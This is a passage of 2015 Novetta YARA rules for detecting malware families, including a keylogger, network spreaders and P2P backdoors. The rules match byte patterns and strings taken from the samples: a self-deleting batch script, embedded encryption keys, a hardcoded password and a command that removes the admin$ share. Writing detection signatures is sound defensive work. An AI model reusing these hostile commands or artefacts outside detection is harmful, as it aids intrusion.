    hash1 = "390c1530ff62d8f4eddff0ac13bc264cbf4183e7e3d6accf8f721ffc5250e724"
  strings:
    $quasarstr1 = "Client.exe" wide
    $quasarstr2 = "({0}:{1}:{2})" wide
    $class = { 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 73 00 00 17 69 00 6E 00 66 00 6F 00 72 00 6D 00 61 00 74 00 69 00 6F 00 6E 00 00 80 }
  condition:
    all of them
}

rule DeltaCharlie {
  meta:
    copyright = "2015 Novetta Solutions"
    author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
  strings:
    $rsaKey = { 7B 4E 1E A7 E9 3F 36 4C DE F4 F0 99 C4 D9 B7 94 A1 FF F2 97 D3 91 13 9D C0 12 02 E4 4C BB 6C 77 48 EE 6F 4B 73 D7 1A 44 13 B3 6A BB 61 44 AF 31 47 E7 87 C2 AE 7A A7 2C 3A D9 5C 2E 42 1A A6 78 FE 2C AD ED 39 3F FA D0 AD 3D D9 C5 3F 58 A0 19 27 CC 27 C9 E8 D8 1E 7E EE 91 DD 13 B3 47 EF 57 1A CA FF 9A 60 E0 64 08 AA E2 92 D0 }
  condition:
    any of them
}

rule HotelAlfa {
  meta:
    copyright = "2015 Novetta Solutions"
    author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
    Source = "58dab205ecb1e0972027eb92f68cec6d208e5ab5.ex_"
  strings:
    $resourceHTML = "RSRC_HTML"
    $rscsDecoderLoop = { 8A [2] 80 F1 ?? 88 [2] 8B [2] 40 3B ?? 72 EF }
  condition:
    $resourceHTML and $rscsDecoderLoop in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
}

rule IndiaAlfa_One {
  meta:
    copyright = "2015 Novetta Solutions"
    author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
  strings:
    $ = "HwpFilePathCheck.dll"
    $ = "AdobeArm.exe"
    $ = "OpenDocument"
  condition:
    2 of them
}

rule IndiaAlfa_Two {
  meta:
    copyright = "2015 Novetta Solutions"
    author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
  strings:
    $ = "ExePath: %s\nXlsPath: %s\nTmpPath: %s\n"
  condition:
    any of them
}

rule IndiaBravo_PapaAlfa {
  meta:
    copyright = "2015 Novetta Solutions"
    author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
  strings:
    $ = "pmsconfig.msi" wide
    $ = "scvrit001.bat"
  condition:
    all of them
}

rule IndiaBravo_RomeoCharlie {
  meta:
    copyright = "2015 Novetta Solutions"
    author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
    Source = "58ad28ac4fb911abb6a20382456c4ad6fe5c8ee5.ex_"
    Status = "Signature is too loose to be useful."
  strings:
    $a = { 50 68 7E 66 04 80 8B 8D [4] 51 FF 15 [4] 83 F8 FF 75 }
    $b1 = "xc123465-efff-87cc-37abcdef9"
    $b2 = "[Check] - PORT ERROR..." wide
    $b3 = "%sd.e%sc n%ssh%srewa%s ad%s po%sop%sing T%s %d"
  condition:
    2 of ($b*) or $a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
}

rule IndiaBravo_RomeoBravo {
  meta:
    copyright = "2015 Novetta Solutions"
    author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
    Source = "6e3db4da27f12eaba005217eba7cd9133bc258c97fe44605d12e20a556775009"
  strings:
    $a = { E8 [4] 68 [2] 00 00 68 [4] A3 [4] 89 15 [4] E8 [4] 83 C4 08 8D [3] 6A 00 5? 68 [2] 00 00 68 [4] 5? FF 15 [4] 5? FF 15 }
    $b1 = "tmscompg.msi" wide
    $b2 = "cvrit000.bat"
  condition:
    2 of ($b*) or $a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
}

rule IndiaBravo_generic {
  meta:
    copyright = "2015 Novetta Solutions"
    author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
  strings:
    $extractDll = "[2] - Extract Dll..." wide
    $createSvc = "[3] - CreateSVC..." wide
  condition:
    all of them
}

rule IndiaCharlie_One {
  meta:
    copyright = "2015 Novetta Solutions"
    author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
  strings:
    $ = "WMPNetworkSvcUpdate"
    $ = "backSched.dll"
    $ = "\\mspaint.exe"
    $aesKey = "X,LLIe{))%%l2i<[AM|aq!Ql/lPlw]d7@C-#j.<c|#*}Kx4_H(q^F-F^p/[t#%HT"
  condition:
    2 of them or $aesKey
}

rule IndiaCharlie_Two {
  meta:
    copyright = "2015 Novetta Solutions"
    author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
  strings:
    $s1 = "%s is an essential element in Windows System configuration and management. %s"
    $s2 = "%SYSTEMROOT%\\system32\\svchost.exe -k "
    $s3 = "%s\\system32\\%s"
    $s4 = "\\mspaint.exe"
    $s5 = ":R\nIF NOT EXIST %s GOTO E\ndel /a %s\nGOTO R\n:E\ndel /a d.bat"
    $aesKey = "}[eLkQAeEae0t@h18g!)3x-RvE%+^`n.6^()?+00ME6a&F7vcV}`@.dj]&u$o*vX"
  condition:
    3 of ($s*) or $aesKey
}

rule IndiaDelta {
  meta:
    copyright = "2015 Novetta Solutions"
    author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
    Source = "d7b50b1546653bff68220996190446bdc7fc4e38373715b8848d1fb44fe3f53c"
  strings:
    $a = { FF 15 [4-12] 3? 78 56 34 12 [0-2] 8? ?? 78 56 34 12 [0-10] FF 15 }
  condition:
    $a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
}

rule IndiaEcho {
  meta:
    copyright = "2015 Novetta Solutions"
    author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
    Source = "66a21f8c72bb4f314604526e9bf1736f75b06cf37dd3077eb292941b476c3235"
  strings:
    $a = { 69 ?? 28 01 00 00 5? 5? FF B5 [4] E8 [4] 8B [5] 69 ?? 28 01 00 00 50 8B [5] ( 05 08 01 00 00 | 03 ?? ) 50 FF [5] E8 [4] 83 C4 ?? 8B [5] 69 ?? 28 01 00 00 ( 81 C7 08 01 00 00 | 03 ?? ) }
  condition:
    $a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
}

rule IndiaGolf {
  meta:
    copyright = "2015 Novetta Solutions"
    author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
    Source = "3dda69dfb254dcaea2ba6e8323d4b61ab1e130a0694f4c43d336cfb86a760c50"
  strings:
    $generateRandomID = { FF ?? 8B ?? C1 ?? 10 FF ?? 03 F8 89 [3] FF ?? 8B ?? C1 ?? 10 FF ?? 03 ?? 89 }
  condition:
    $generateRandomID in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
}

rule IndiaHotel {
  meta:
    copyright = "2015 Novetta Solutions"
    author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
    Source = "8a4fc5007faf85e07710dca705108df9fd6252fe3d57dfade314120d72f6d83f"
  strings:
    $fileExtractorArraySetup = { 6A 0A 8D [5-6] 68 10 02 00 00 50 E8 }
  condition:
    $fileExtractorArraySetup in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
}

rule IndiaJuliett_1 {
  meta:
    copyright = "2015 Novetta Solutions"
    author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
    Source_writeFile = "a164c0ba0be7c33778c12a6457e9c55a2935564a"
  strings:
    $configFilename = { 00 73 63 61 72 64 70 72 76 2E 64 6C 6C 00 }
    $suicideScript = ":R\nIF NOT EXIST %s GOTO E\ndel /a %s\nGOTO R\n:E\ndel /a d.bat"
    $commKey = { 10 20 30 40 50 60 70 80 90 11 12 13 1A FF EE 48 }
    $handshake = { 68 30 75 00 00 [4] 6A 04 5? 5? C? [3] 00 10 00 00 E8 [7] 83 F8 FF 0F 84 ?? ?? 00 00 8? [3] 5? E8 [4] 6A 00 68 30 75 00 00 }
    $writeFile = { 68 00 28 00 00 5? E8 [4-7] 8D [3] 6A 00 5? 68 00 28 00 00 5? 5? FF 15 [4] 81 ?? 00 28 00 00 81 ?? 00 28 00 00 81 ?? 00 28 00 00 }
  condition:
    ($configFilename in ((pe.sections[pe.section_index(".data")].raw_data_offset)..(pe.sections[pe.section_index(".data")].raw_data_offset + pe.sections[pe.section_index(".data")].raw_data_size)) or $suicideScript in ((pe.sections[pe.section_index(".data")].raw_data_offset)..(pe.sections[pe.section_index(".data")].raw_data_offset + pe.sections[pe.section_index(".data")].raw_data_size))) or ($handshake in ((pe.sections[pe.section_index(".rsrc")].raw_data_offset)..(pe.sections[pe.section_index(".rsrc")].raw_data_offset + pe.sections[pe.section_index(".rsrc")].raw_data_size)) and $commKey in ((pe.sections[pe.section_index(".rsrc")].raw_data_offset)..(pe.sections[pe.section_index(".rsrc")].raw_data_offset + pe.sections[pe.section_index(".rsrc")].raw_data_size))) or $writeFile in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
}

rule IndiaWhiskey {
  meta:
    copyright = "2015 Novetta Solutions"
    author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
    Source = "0c729deec341267c5a9a2271f20266ac3b0775d70436c7770ddc20605088f3b4"
    Description = "Winsec Installer"
  strings:
    $a = { FF 15 [4] 83 C4 18 8D [5] 5? 5? 5? 5? 5? 5? 6A 01 [0-2] 6A 02 68 20 01 00 00 68 FF 01 0F 00 FF 75 ?? FF 75 ?? ( 5? | FF 75 ?? ) FF 15 }
  condition:
    $a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
}

rule KiloAlfa {
  meta:
    copyright = "2015 Novetta Solutions"
    author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
    type = "Keylogger"
    SourceForDnscalcVariant1 = "b855d05ef7ab6582864c9b35052a1073a6eb7d0c7e9d97f524ec062715d71321"
    SourceForDnscalcVariant2 = "ddde628be8cd5db768b807510ae1319888e6c4550a5b9a0d54e17b9ec4aaa256"
  strings:
    $keyxlate = { 68 ?? 00 00 00 FF 15 [4] 66 ?? 01 80 75 ?? 6A ?? E8 [4] 83 C4 04 68 ?? 00 00 00 FF 15 [4] 66 ?? 01 80 75 ?? 6A ?? E8 [4] 83 C4 04 68 ?? 00 00 00 FF 15 [4] 66 ?? 01 80 75 ?? 6A ?? E8 [4] 83 C4 04 68 ?? 00 00 00 FF 15 [4] 66 ?? 01 80 75 ?? 6A ?? E8 [4] 83 C4 04 }
    $keyxlateDnscalc1 = { 6A 2A C6 [6] D6 C6 [6] E1 C6 [6] BF C6 [6] C8 C6 [6] C3 C6 [6] BD 88 [6] FF 15 [4] 66 3D 01 80 75 ?? 8D [6] 8D [6] 5? 6A 07 5? E8 [4] 50 E8 [4] 83 C4 10 }
    $keyxlateDnscalc2 = { 6A 2A C7 [5] D6 E1 BF C8 66 [6] C3 BD 88 [5] FF 15 [4] BA 01 80 FF FF 66 3B C2 75 ?? 8D [5] 5? 8D [5] 6A 07 5? E8 [4] 50 E8 [4] 83 C4 10 }
  condition:
    $keyxlate in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) or $keyxlateDnscalc1 in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) or $keyxlateDnscalc2 in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
}

rule LimaAlfa {
  meta:
    copyright = "2015 Novetta Solutions"
    author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
    Source = "c9fbad7fc7ff7688776056be3a41714a1f91458a7b16c37c3c906d17daac2c8b"
    Status = "Signature is too loose to be useful."
  strings:
    $a = { 33 C0 66 [2] 8B ?? 81 ?? 00 F0 FF FF 81 ?? 00 30 00 00 75 ?? 8B [3] 25 FF 0F 00 00 03 C7 01 }
  condition:
    $a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
}

rule LimaBravo {
  meta:
    copyright = "2015 Novetta Solutions"
    author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
    Source = "Mwsagent.dll"
  strings:
    $a = { 83 ?? 34 83 ?? 0A [0-2] 7E ?? 5? C6 ?? 4D C6 [2] 5A E8 }
  condition:
    $a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
}

rule LimaCharlie {
  meta:
    copyright = "2015 Novetta Solutions"
    author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
    Source_x86 = "6ee6ae79ee1502a11ece81e971a54f189a271be9ec700101a2bd7a21198b94c7"
    Source_x64 = "90ace24eb132c776a6d5bb0451437db21e84601495a2165d75f520af637e71e8"
  strings:
    $misspelling = "Defualt Sleep = %d" wide
    $x86 = { FF ?? 74 5? 5? 8F ?? 48 01 00 00 85 C0 5? 8F ?? 44 01 00 00 75 ?? F6 [2] 01 74 }
    $x64 = { 48 [2] 70 48 [2] 60 01 00 00 48 [2] 68 01 00 00 48 85 C0 75 ?? F6 [2] 01 74 }
  condition:
    $x86 in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) or $x64 in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) or $misspelling
}

rule LimaDelta {
  meta:
    copyright = "2015 Novetta Solutions"
    author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
    Source = "81e6118a6d8bf8994ce93f940059217481bfd15f2757c48c589983a6af54cfcc"
  strings:
    $fileDecoder = { 8B ?? ?? 83 ?? 10 81 ?? 6D 3A 71 58 89 ?? 33 ?? 66 ?? ?? F0 89 ?? 04 83 ?? 08 4? 75 }
    $authenicateBufferGen = { BB 01 74 ?? FF 15 [4] 99 B? 32 00 00 00 F7 ?? 8B ?? 8D [3] 5? 5? E8 [4] 83 C4 08 83 ?? 46 }
  condition:
    $authenicateBufferGen in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) or $fileDecoder in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
}

rule PapaAlfa {
  meta:
    copyright = "2015 Novetta Solutions"
    author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
  strings:
    $ = "pmsconfig.msi" wide
    $ = "pmslog.msi" wide
    $ = "%sd.e%sc n%ssh%srewa%s ad%s po%sop%sing T%s %d"
    $ = "CreatP2P Thread" wide
    $ = "GreatP2P Thread" wide
  condition:
    3 of them
}

rule RomeoAlfa {
  meta:
    copyright = "2015 Novetta Solutions"
    author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
    Source = "fba0b8bdc1be44d100ac31b864830fcc9d056f1f5ab5486384e09bd088256dd0.file2.bin"
  strings:
    $zeroIPLoader = { 68 [4] 56 E8 [4] 83 C6 28 83 C4 08 81 FE [4] 7C E? }
    $sleeper = { 5? 8B [3] 85 ?? 7E ?? 5? 8B 3D [4] 68 [4] FF ?? 4? 75 ?? 5? 5? C3 }
    $xercesc = "xercesc"
  condition:
    ($sleeper in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) or $zeroIPLoader in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))) and not $xercesc
}

rule RomeoBravo {
  meta:
    copyright = "2015 Novetta Solutions"
    author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
    Source = "95314a7af76ec36cfba1a02b67c2b81526a04e3b2f9b8fb9b383ffcbcc5a3d9b"
  strings:
    $a = { E8 [4] 83 C4 10 85 C0 74 ?? B? 02 00 00 00 5? 83 C4 18 C3 6A 78 6A 01 8D [3] 6A 0C 5? 5? E8 [4] 83 C4 14 85 C0 74 ?? B8 02 00 00 00 }
  condition:
    $a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
}

rule RomeoCharlie {
  meta:
    copyright = "2015 Novetta Solutions"
    author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
    Source = "a82108ef7115931b3fbe1fab99448c4139e22feda27c1b1d29325710671154e8"
  strings:
    $auth1 = "Success - Accept Auth"
    $auth2 = "Fail - Accept Auth"
    $startupRelayThreads = { 81 ?? FF FF 00 00 8B ?? 5? C1 ?? 10 81 ?? FF FF 00 00 8B ?? 8B ?? 81 ?? FF FF 00 00 C1 ?? 10 6A 00 0B ?? 6A 00 50 68 [4] 6A 00 6A 00 FF 15 [4] C1 ?? 10 }
    $crypto = { 2? 00 20 00 00 3? 00 20 00 00 0F [2] 81 ?? 80 00 00 00 33 ?? 80 ?? 80 0F [2] 03 ?? 33 ?? 83 ?? 01 }
  condition:
    all of ($auth*) or $startupRelayThreads in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) or $crypto in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
}

rule RomeoDelta {
  meta:
    copyright = "2015 Novetta Solutions"
    author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
    Source = "1df2af99fb3b6e31067b06df07b96d0ed0632f85111541a416da9ceda709237c"
  strings:
    $loginInit = { E8 [4] 33 C0 8A [3] 80 [2] 80 [2] 88 [3] 40 83 F8 10 7C ?? 6A 01 8D [3] 6A 10 5? 8B CB E8 }
  condition:
    $loginInit in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
}

rule RomeoEcho {
  meta:
    copyright = "2015 Novetta Solutions"
    author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
  strings:
    $ = "%s %-20s %10lu %s"
    $ = "_quit"
    $ = "_exe"
    $ = "_put"
    $ = "_get"
  condition:
    all of them
}

rule RomeoFoxtrot {
  meta:
    copyright = "2015 Novetta Solutions"
    author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
    Source = "dropped.bin"
    Source_relativeCalls = "635bebe95671336865f8a546f06bf67ab836ea35795581d8a473ef2cd5ff4a7f"
  strings:
    $connect = { C7 [3] 01 00 00 00 8B [6] C7 [3] 00 00 20 03 5? 89 [3] ( FF 15 | E8 ) [4] 6A 06 6A 01 6A 02 66 [4] 66 [4] 02 00 ( FF 15 | E8 ) [4] 83 F8 FF 89 [2] 0F 84 [4] [0-7] 8D [3] 6A 04 5? 68 02 10 00 00 68 FF FF 00 00 5? ( FF D? | E8 [3] ?? ) 8B [2] 8D [3] 6A 04 5? 68 01 10 00 00 68 FF FF 00 00 5? ( FF D? | E8 [3] ?? ) }
    $response = "RESPONSE 200 OK!!!"
  condition:
    $response or $connect in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
}

rule RomeoGolf {
  meta:
    copyright = "2015 Novetta Solutions"
    author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
    Source = "7322d6b9328a9c708518c99b03a4ed3aa6ba943d7b439f6b1925e6d52a1828fe"
  strings:
    $idGen = { FF 15 [4] 50 E8 [4] 83 C4 04 E8 [4] C1 ?? 10 89 [2] E8 [4] 01 [2] E8 [4] C1 ?? 10 89 [2] E8 [4] ?? ?? ?? }
  condition:
    $idGen in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
}

rule RomeoHotel {
  meta:
    copyright = "2015 Novetta Solutions"
    author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
    Source_64 = "440cb3f6dd07e2f9e3d3614fd23d3863ecfc08b463b0b327eedf08504f838c90"
    Source_diskSpace = "1b1496f8f35d32a93c7f16ebff6e9b560a158cc6fce061491f91bc9f43ef5be4"
  strings:
    $randBuff64 = { E8 [4] 44 [2] 44 [2] B? 1F 85 EB 51 48 [2] 41 [2] C1 ?? 05 8B ?? C1 ?? 1F 03 ?? 6B ?? 64 44 [2] 41 [2] 3C }
    $diskSpace = { FF 15 [4] 85 C0 74 ?? 8B [6] 6A 00 99 68 00 00 10 00 5? 5? E8 }
    $winst = "winsta0\\default" wide
  condition:
    $randBuff64 in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) or ($diskSpace in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) and $winst)
}

rule RomeoWhiskey_Two {
  meta:
    copyright = "2015 Novetta Solutions"
    author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
    Source = "a8d88714f0bc643e76163d1b8972565e78a159292d45a8218d0ad0754c8f561d"
  strings:
    $a = { FF 15 [4] 66 8B C8 [3-4] 66 81 F1 40 1C 66 D1 E9 81 C1 E0 56 00 00 0F B7 C9 0F B7 C0 81 F1 30 32 00 00 C1 E0 10 0B C8 }
  condition:
    $a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
}

rule RomeoWhiskey_One {
  meta:
    copyright = "2015 Novetta Solutions"
    author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
    Source = "5d21e865d57e9798ac7c14a6ad09c4034d103f3ea993295dcdf8a208ea825ad7"
  strings:
    $a = { FF 15 [4] 0F B7 C0 8B C8 [2-4] C1 E9 ?? 81 F1 [2] 00 00 [0-2] C1 E0 10 0B C8 }
  condition:
    $a in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
}

rule SierraAlfa {
  meta:
    copyright = "2015 Novetta Solutions"
    author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
    Source = "4d4b17ddbcf4ce397f76cf0a2e230c9d513b23065f746a5ee2de74f447be39b9.ex_"
  strings:
    $connectTest = { 8D [3] 5? 68 7E 66 04 80 5? E8 [4] 8D [3] 6A 10 5? 5? E8 [4] 8B [6] 8D [3] 5? 8D [3] 6A 00 5? 6A 00 6A 00 89 [3] 89 [3] 89 [3] C7 [7] E8 [4] 33 ?? 5? 85 C0 0F 9F ?? 8B ?? E8 }
    $maths = { E8 [4] 8B ?? E8 [4] 0F AF ?? E8 [4] 0F AF ?? 99 33 ?? 2B ?? 33 ?? F7 ?? 8B ?? 5? E8 }
    $s1 = "recdiscm32.exe"
    $s2 = "\\\\%s\\shared$\\syswow64"
    $s3 = "\\\\%s\\shared$\\system32"
  condition:
    $connectTest in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) or $maths in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) or 3 of ($s*)
}

rule SierraBravo_Two {
  meta:
    copyright = "2015 Novetta Solutions"
    author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
  strings:
    $smbComNegotiationPacketGen = { 66 C7 ?? 0E 07 C8 [0-32] C7 ?? 39 D4 00 00 80 [0-32] 66 C7 ?? 25 FF 00 [0-32] 66 C7 ?? 27 A4 00 [0-32] 66 C7 ?? 29 04 41 [0-32] 66 C7 ?? 2B 32 00 }
    $lib = "!emCFgv7Xc8ItaVGN0bMf"
    $api1 = "!ctRHFEX5m9JnZdDfpK"
    $api2 = "!emCFgv7Xc8ItaVGN0bMf"
    $api3 = "!VWBeBxYx1nzrCkBLGQO"
    $pwd = "iamsorry!@1234567"
  condition:
    $smbComNegotiationPacketGen in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) or ($pwd in ((pe.sections[pe.section_index(".data")].raw_data_offset)..(pe.sections[pe.section_index(".data")].raw_data_offset + pe.sections[pe.section_index(".data")].raw_data_size)) and ($lib in ((pe.sections[pe.section_index(".data")].raw_data_offset)..(pe.sections[pe.section_index(".data")].raw_data_offset + pe.sections[pe.section_index(".data")].raw_data_size)) or $api1 in ((pe.sections[pe.section_index(".data")].raw_data_offset)..(pe.sections[pe.section_index(".data")].raw_data_offset + pe.sections[pe.section_index(".data")].raw_data_size)) or $api2 in ((pe.sections[pe.section_index(".data")].raw_data_offset)..(pe.sections[pe.section_index(".data")].raw_data_offset + pe.sections[pe.section_index(".data")].raw_data_size)) or $api3 in ((pe.sections[pe.section_index(".data")].raw_data_offset)..(pe.sections[pe.section_index(".data")].raw_data_offset + pe.sections[pe.section_index(".data")].raw_data_size))))
}

rule SierraBravo_One {
  meta:
    copyright = "2015 Novetta Solutions"
    author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
  strings:
    $spreaderSetup = { 68 7E 66 04 80 5? E8 [4] 6A 32 89 B4 [5] C7 84 [5] 01 00 00 00 C7 44 [2] 03 00 00 00 C7 44 [2] 00 00 00 00 }
  condition:
    $spreaderSetup in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
}

rule SierraBravo_packed {
  meta:
    copyright = "2015 Novetta Solutions"
    author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
  strings:
    $ = "cmd.exe /c \"net share admin$ /d\""
    $ = "MAIL FROM:<"
    $ = ".petite"
    $ = "Subject: %s|%s|%s"
  condition:
    3 of them
}

rule SierraCharlie {
  meta:
    copyright = "2015 Novetta Solutions"
    author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
    Source = "f4750e1d82b08318bdc1eb6d3399dee52750250f7959a5e4f83245449f399698.bin"
  strings:
    $dnsResolve = { 8B 0D 50 A7 56 00 81 F6 8C 3F 7C 5E 6A 01 50 85 C9 74 3A FF D1 }
    $file1 = "wmplog21t.sqm"
    $file2 = "wmplog15r.sqm"
    $file3 = "wmplog09c.sqm"
  condition:
    $dnsResolve in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size)) or 2 of ($file*)
}

rule SierraJuliettMikeOne {
  meta:
    copyright = "2015 Novetta Solutions"
    author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
  strings:
    $commKey = { 10 20 30 40 50 60 70 80 90 11 12 13 1A FF EE 48 }
    $handshake = { 68 30 75 00 00 [4] 6A 04 5? 5? C? [3] 00 10 00 00 E8 [7] 83 F8 FF 0F 84 ?? ?? 00 00 8? [3] 5? E8 [4] 6A 00 68 30 75 00 00 }
  condition:
    $commKey in ((pe.sections[pe.section_index(".data")].raw_data_offset)..(pe.sections[pe.section_index(".data")].raw_data_offset + pe.sections[pe.section_index(".data")].raw_data_size)) and $handshake in ((pe.sections[pe.section_index(".text")].raw_data_offset)..(pe.sections[pe.section_index(".text")].raw_data_offset + pe.sections[pe.section_index(".text")].raw_data_size))
}

rule RomeoJuliettMikeTwo {
  meta:
    copyright = "2015 Novetta Solutions"
    author = "Novetta Threat Research & Interdiction Group - trig@novetta.com"
    Source = "819722ba1c5b9d0b360c54cbdd3811d0cac1a9230720b3ed4815f78bcacb3653_d1ba9ba2987f59d99ce4bf09393c0521c4d1f2961c5aeed4e0bf86e78303d27c"
  strings:
    $recvFunc = { 81 [3] 33 27 00 00 75 ?? 8D [3] 5? FF 15 [4] 8B [3] 83 ?? 04 8B ?? 4? 83 ?? 64 }
    $apiLoader = { E8 [4] 8B [3] 8B ?? 5? E8 [4] 83 C4 08 85 ?? 74 ?? 85 C0 74 ?? 5? FF 15 [4] 5? 8B ?? E8 [4] 83 C4 04 5? 5? FF 15 }
    $recvPeers = { 68 B8 0B 00 00 FF 15 [4] 6A 01 [0-4] 68 B0 04 00 00 51 8B ?? [1-4] B0 04 00 00 E8 [4] 83 F8 FF }
    $logFileName = "KBD_%%s_%%02d%%02d%%02d%%02d%%02d.CAT"
  condition:
